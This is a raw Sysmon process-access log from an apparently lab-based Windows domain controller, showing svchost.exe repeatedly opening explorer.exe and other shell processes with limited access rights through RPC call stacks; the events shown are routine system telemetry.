15:16:22.736{732C744F-151A-600B-0D00-00000000A301}6248C:\Windows\system32\svchost.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788574Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.736{732C744F-151A-600B-0D00-00000000A301}6248C:\Windows\system32\svchost.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788573Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.736{732C744F-151A-600B-0D00-00000000A301}6248C:\Windows\system32\svchost.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788572Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.736{732C744F-151A-600B-0D00-00000000A301}6248C:\Windows\system32\svchost.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788571Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.736{732C744F-151A-600B-0D00-00000000A301}6248C:\Windows\system32\svchost.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788570Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.736{732C744F-151A-600B-0D00-00000000A301}6248C:\Windows\system32\svchost.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788569Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.736{732C744F-151A-600B-0D00-00000000A301}6248C:\Windows\system32\svchost.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788568Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.736{732C744F-151A-600B-0D00-00000000A301}6248C:\Windows\system32\svchost.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788567Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.736{732C744F-151A-600B-0D00-00000000A301}6248C:\Windows\system32\svchost.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788566Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.736{732C744F-151A-600B-0D00-00000000A301}6248C:\Windows\system32\svchost.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788565Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.736{732C744F-151A-600B-0D00-00000000A301}6248C:\Windows\system32\svchost.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788564Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.736{732C744F-151A-600B-0D00-00000000A301}6248C:\Windows\system32\svchost.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788563Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.736{732C744F-151A-600B-0D00-00000000A301}6248C:\Windows\system32\svchost.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788562Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.736{732C744F-151A-600B-0D00-00000000A301}6248C:\Windows\system32\svchost.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788561Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.736{732C744F-151A-600B-0D00-00000000A301}6248C:\Windows\system32\svchost.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788560Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.736{732C744F-151A-600B-0D00-00000000A301}6248C:\Windows\system32\svchost.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788559Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.736{732C744F-151A-600B-0D00-00000000A301}6248C:\Windows\system32\svchost.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788558Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.736{732C744F-151A-600B-0D00-00000000A301}6248C:\Windows\system32\svchost.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788557Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.736{732C744F-151A-600B-0D00-00000000A301}6248C:\Windows\system32\svchost.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788556Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.736{732C744F-151A-600B-0D00-00000000A301}6248C:\Windows\system32\svchost.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788555Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.736{732C744F-151A-600B-0D00-00000000A301}6248C:\Windows\system32\svchost.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788554Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.736{732C744F-151A-600B-0D00-00000000A301}6248C:\Windows\system32\svchost.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788553Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.736{732C744F-151A-600B-0D00-00000000A301}6248C:\Windows\system32\svchost.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788552Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.736{732C744F-151A-600B-0D00-00000000A301}6248C:\Windows\system32\svchost.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788551Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.736{732C744F-151A-600B-0D00-00000000A301}6248C:\Windows\system32\svchost.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788550Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.736{732C744F-151A-600B-0D00-00000000A301}6248C:\Windows\system32\svchost.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788549Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.736{732C744F-151A-600B-0D00-00000000A301}6248C:\Windows\system32\svchost.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788548Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.736{732C744F-151A-600B-0D00-00000000A301}6248C:\Windows\system32\svchost.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788547Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.736{732C744F-151A-600B-0D00-00000000A301}6248C:\Windows\system32\svchost.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788546Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.736{732C744F-151A-600B-0D00-00000000A301}6248C:\Windows\system32\svchost.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788545Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.736{732C744F-151A-600B-0D00-00000000A301}6248C:\Windows\system32\svchost.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788544Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.736{732C744F-151A-600B-0D00-00000000A301}6248C:\Windows\system32\svchost.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788543Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.736{732C744F-151A-600B-0D00-00000000A301}6248C:\Windows\system32\svchost.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788542Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 